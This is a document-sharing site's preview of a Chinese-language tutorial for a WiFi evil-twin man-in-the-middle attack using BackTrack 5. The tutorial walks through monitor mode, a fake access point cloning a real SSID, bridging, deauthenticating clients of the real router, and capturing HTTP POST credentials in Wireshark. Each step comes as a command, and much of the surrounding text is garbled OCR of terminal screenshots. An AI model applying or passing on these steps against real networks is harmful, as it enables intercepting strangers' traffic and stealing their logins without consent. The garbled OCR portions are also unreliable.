wifi数据包捕获_第1页
wifi数据包捕获_第2页
wifi数据包捕获_第3页
wifi数据包捕获_第4页
wifi数据包捕获_第5页
免费预览已结束,剩余5页可下载查看

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、BT5+wireshark 玩 wifi 数据包捕获和 session 注入(中间人攻击)介绍:主要思路是通过伪造相同名称的wifi接入点,配合发送ARP数据包,攻击连入伪造wifi的用户。一个与原有wifi相同名称的伪造接入点一旦建立,会导致用户从原有链接中断开,并连入你所建立的伪造接入点中,因此所有的通信通道都会流经我的系统,届时我们通常会用session注入的方式拿到用户所有的细节/授信状态/信息等。必备神器:1,BT5(Backtrack操作系统)2,虚拟机(带USB设备)3,可联网的主机第一步:开BT5的terminal终端,然后输入iwconfig”检查无线网卡。说明:iwconf

2、ig类似于ifconfig,但是是用于无线网络的。它经常被用来设置无线网卡的参数。0w*rooted-FileEdtviewiferminafHelprootJdeepanshjIwconfiglonowirelessextensions.wlanOIEEE8&2*llbgnE5SIDoff/anyMode:ManagedAccessPoint:Not*AssociatedTxPowerj26dBmRetrylonglimit:?RTSthr:offFragmentthr:offEncryptionkey*offPcv/erMnageiTtentfethOnowirelessextension

3、sroot3deepanshd|第二步:输入airmon-ngstartwlan0”开启无线网卡。说明:这个命令可以被用来让无线网卡处于监听状态。也可以被用来从监听模式中恢复成管理模式。输入airmon-ng”不带参数,可以显示网卡状态。wlan0是指wifi网卡。wlan是无线局域网,0是你的网卡编号|八丫*tootede4panAhu:FileEditVievTerminalHelprootcdeepanihu:-*-#alrmon-ngstartwLanOFound2processesthatcouldcausetrouble.ITalrodurnpng*aireplay-ngoralr

4、tun-ngstopsworkingafteraShortperladoftime,youmaywanttokill(sameof)them!PIDme1619rihcli?nt32496cfhclientJProcesswithP1D2496dhclientl)isrunningoninterfacewlanOInterfaceChips总IDriverwliinGAtherosAR9271nthgk-JphyGJ(monitormodeenabledonTonQ)rotrdeepanshu:#第三步:在网卡已经启动了监听模式后,输入airodump-ngmon0”就可以开始抓包了。说明:a

5、irodump-ng可以用来抓802.11的原始帧数据包,特别适合于收集WEP的初始化向量用于aircrack-ng的破解。Airodump-ng也能够用来记录找到的接入点的坐标。mon0在监听模式下和wlan0的意思是一样的。一旦你把wlan0设置为监听模式,wlan0就要改为mon0。小 yxrootedecpmhu:FileEJiiViewTemrunalHdpr;ctrjtep-:5tiL:*alrdutipngnon*CH4)(E 匕口 sE:2526146414:31BSSIDPWR 和 dLd,银CHM6EMCCIPHEfiAbTHESSID94:442-DA:Bl:2了 TS2

6、9554eWPA2CCMPP5Kbkink344BF4;3E;fil;Efl;52:CT852654WPA2CCHPPWKHIYAAV第四步:设置在airodump-ng中显示的频道ID,命令如下:“iwconfigmon0channel5iwconfigwlan0channel5”或者“iwconfigwlan0channel5iwconfigmon0channel5”说明:参数“channel”用来选定一个单独的特殊频道。n7Krootdeepanshu:FileEditViewTerminalHelpiwconfigmonochannel5uotideepanshu:iwconfigch

7、annel5第五步:现在开始建立你的伪造路由器,命令如下:“airbase-ng-e“belkin.3448”mon。说明:airbase-ng是个多用途的工具,可针对AP(接入点)自身的客户端进行攻击,主要的思路是驱使客户端去连接伪造的AP,不是阻止客户端去连接真实APo“-e+SSID”指定伪造AP的SSID名称。八丫*rootdeepanhu!一FileEditViewifeminalHelproatfndeepanshuairbase-ng-ebclkln.34481none14:34:58CreatedtapinterfaceatS14:34:50TryingtosetMTUonat

8、Qto15G014:34:58TryingtosetMTUonmonG)to18314:34158AccessPointWltliBS5ID9G:F6:52:E3:2E:(2started,用八少:现在是时候去“桥接”所有的网络了,命令如下:“brctladdbrmitm”“brctladdifmitmeth0”“brctladdifmitmat0”中间人就是interfacename。(这句话看原文直接翻译有些难以理解,实际上作者就是想说at0这个网卡架起来的网桥就是个中间人,攻击就是在这里完成的。一-译者注)说明:Brctl用来在两个网卡之间建立桥接网络。Addbr用来添加网桥的对象,用来

9、指定网桥的名称。Addif给已经使用addbr创建的网桥中添加一个网卡,后边的参数使用你要添加的网卡名称即可。匹u算rootbt!FileEditViewTerminalHelpootdeepanshu:brctladdbrmltm-ootgdeepanshiF:brctladdifmitmethGootadeepanshu:brctladdifmtmatO|第七步:现在创建一个新的网卡配置,命令如下:“ifconfigeth0up”“ifconfigat0up”说明:ifconfig不用多说了,用来配置网卡,大家经常用的45KrootdeepanshuFileEd

10、itViewIferminaiHelprootdeepanshu:ifconfigethG0.0.,0uprootgdeepanshu:ifconfigat0.Q.0.0up第八步:现在可以启动我们用来做中间人攻击的网桥了!命令如下:“ifconfigmitmup”说明:配置完成的网桥可以使用ifconfig来启用八H父rootdeepanshu:FileEdrtViewTenminalHelprootdeepanshuifconfigfnitmuprootdeepanEhu 一#第九步:现在使用下面的命令发送认证包到路由器上,aireplay-ng-deauth0-a94:44:52:DA:

11、B4:28mon。说明:aireplay-ng用来注入帧数据。-a指定被攻击者的BSSID入卡*rootedeepanshu:-RieEditViewTemninaiHelpr1小中心心1川:Tdlrepl.d/-nMXrootdeepanshu:AleEditVffwTprrnina!Hplprootdeepsntiuairbase-ng-ebelkin.3448mond13r37:46Createdtapinterfacemt白13:37:46TryingtosetMTUonatetn156013:37:46TryingtosetMTUMnon8to180013:37:4&AccessPo

12、intrflthB5SID90;F6;52:E3E;C2Et日ted.13:39:26Client26:58:9D:6D;a6:0Cassociated(unencrypted)toESSID:belkin,344y第十二步:开wireshark,命令:“wireshark&”说明:wireshark是个网络协议抓包分析器a*K一FileEditViewTemninalHelo(1J3&G3第十三步:NetworkProtocolAnalyzerRccistenrgeissectordcerpc_5crtlIONTheWorldsMostPopularNetworkVersion1.8J(5V

13、NRevUnknownfromunkrtoMCaptureInterfaceListLivelistofthecaptureinterfaces(coyntsincgEinqpckmiOpenRecenistartcroo5one5mosinhrfac5tqSame己sCdpturEnnterfaceswithjdefdultoptionsAritn选择网卡,点开始(start)皋monOyCaptureOptionsStart 可 capturewithdetailedapcions第十四步:输入httpcontainsPOST”过滤一下,然后你就可以看到所有抓下来的数据包了http:/ex

14、/admin.phpPassword1234htlR二vnwweml口tHeemrtshKdpcoruLdniIru口飞口Lin#-textJaza:applicatnjnzx-ww,fsnUFISDCEKn-JicrFHne-QB&Iqp*sd-11承呈状ziiz-LaaLi个印:止油*.8也七cee即足廿aMQ8昶加,6口UxjdMpFXTfiEaprurrPOSTpseE&HJurstypt力aneJibar-Hpe&fitilh5POST.rq/raia: 。 山 (1 肃pu.kcep*Creedjng:grip,delae.sddi-AccftLs力 孑 口 呷占;en-Ifi.er:.D0.0.Actr2&舶长74弱;$5DILC .4rh-5-2Icil-ft62666c4c3w7HJ,1oo1oB33J42-n-M-599966fio-J91fldsfi57-MMMMHNJJJOJJJO讣T*T*1 13jftf&iij-f.-tn-9,1-rCQ4LC.plbL】d*位触bK923d4

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论